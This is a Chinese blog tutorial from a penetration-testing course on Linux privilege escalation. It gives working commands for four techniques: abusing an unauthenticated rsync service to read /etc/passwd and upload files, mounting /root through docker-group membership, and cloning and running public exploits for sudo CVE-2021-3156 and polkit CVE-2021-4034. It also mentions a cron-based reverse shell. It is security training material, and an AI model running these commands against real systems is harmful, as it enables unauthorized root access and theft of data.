第105天:权限提升-Linux 系统&Docker 挂载&Rsync 未授权&Sudo-CVE&Polkit&CVE

目录

思维导图

[案例一: Linux-Rsync 未授权访问覆盖-本地](#案例一: Linux-Rsync 未授权访问覆盖-本地)

[案例二: Linux-Docker 组用户挂载目录-本地](#案例二: Linux-Docker 组用户挂载目录-本地)

[案例三: Linux-Sudo(CVE-2021-3156)-本地](#案例三: Linux-Sudo(CVE-2021-3156)-本地)

案例四:Linux-Polkit(CVE-2021-4034)-本地


思维导图

案例一: Linux-Rsync 未授权访问覆盖-本地

rsync 文件传输协议-linux 端口873

配置不当会造成未授权访问。没有配置ACL或者访问密码,可以读取目标服务器文件

靶场环境:

访问端口

判断是否有该漏洞的方法:

复制代码
rsync rsync://123.58.224.8:58515

利用读取文件

复制代码
rsync rsync://123.58.224.8:58515/src

下载文件 ./ 为当前目录

复制代码
rsync rsync://123.58.224.8:58515/src/etc/passwd ./

上传文件

复制代码
rsync -av passwd rsync://123.58.224.8:58515/src/tmp/passwd

利用他去反弹shell的思路:利用计时任务

这里由于该靶场为在线靶场,有时间限制,且必须利用公网ip反弹shell,这里利用下面的网址,搭建在线靶场:Vulhub - Docker-Compose file for vulnerability environment

首先把计时任务保存到本地

查看可利用的文件

必须加执行权限

把脚本进行上传

开启监听等待

刚好反弹shell

案例二: Linux-Docker 组用户挂载目录-本地

首先条件:普通用户在docker组,利用docker服务启动镜像挂载目录

从而来访问root目录、etc目录等敏感文件来进行权限提升。

​环境搭建

useradd -d /home/test -m test (创建test用户)

passwd test (修改密码)

usermod -G docker test (把test用户加入到docker组当中)

利用命令

docker run -v /root:/mnt -it alpine

docker下载alpine镜像,然后利用-v选项把/root目录挂载到docker里面的/mnt目录,-it进入docker,进去以后他会默认你是root用户,你可以去查看/mnt下里面/root的敏感文件

这里我提权拉取了一次所以没有下载过程

root目录直接挂载到了/mnt目录下获得了敏感信息的窃取

不仅可以调用/root,也可以调用其他目录,因为docker命令需要执行下载,等等操作,在这个过程当中本身就是root权限,所以所有目录都可以

案例三: Linux-Sudo(CVE-2021-3156)-本地

影响版本

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

这台机器正好符合

或者利用 sudoedit -s / 去查看如果有报错那证明有漏洞,没报错证明没有

有漏洞的报错

没有漏洞的报错

可能用到的代码

复制代码
git clone https://github.com/blasty/CVE-2021-3156.git  #下载
cd CVE-2021-3156
make    #编译
chmod a+x sudo-hax-me-a-sandwich #加执行权限
./sudo-hax-me-a-sandwich 1   #后面的数字1是选择模式

执行效果

案例四:Linux-Polkit(CVE-2021-4034)-本地

漏洞影响2009年5月至今的所有polkit版本

由于polkit是系统预装工具,所有存在polkit的linux系统均受影响

如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等

判断

复制代码
dpkg -l policykit-1

如果是这种信息的话那证明可能可以利用

git clone https://github.com/berdav/CVE-2021-4034.git

cd CVE-2021-4034/

make

./cve-2021-4034

相关推荐
csdn_aspnet31 分钟前
在 Docker 上安装和配置 Kafka、选择用于部署 Kafka 的操作系统
docker·kafka
花嫁代二娃5 小时前
Linux:环境变量
linux
乌托邦的逃亡者6 小时前
Docker的/var/lib/docker/目录占用100%的处理方法
运维·docker·容器
ldj20206 小时前
Jenkins 流水线配置
运维·jenkins
zskj_zhyl7 小时前
毫米波雷达守护银发安全:七彩喜跌倒检测仪重构居家养老防线
人工智能·安全·重构
古希腊数通小白(ip在学)8 小时前
stp拓扑变化分类
运维·服务器·网络·智能路由器
OKUNP10 小时前
Docker高级管理--容器通信技术与数据持久化
docker·容器·php
l1x1n010 小时前
Vim 编辑器常用操作详解(新手快速上手指南)
linux·编辑器·vim
12点一刻10 小时前
搭建自动化工作流:探寻解放双手的有效方案(2)
运维·人工智能·自动化·deepseek
未来之窗软件服务10 小时前
东方仙盟AI数据中间件使用教程:开启数据交互与自动化应用新时代——仙盟创梦IDE
运维·人工智能·自动化·仙盟创梦ide·东方仙盟·阿雪技术观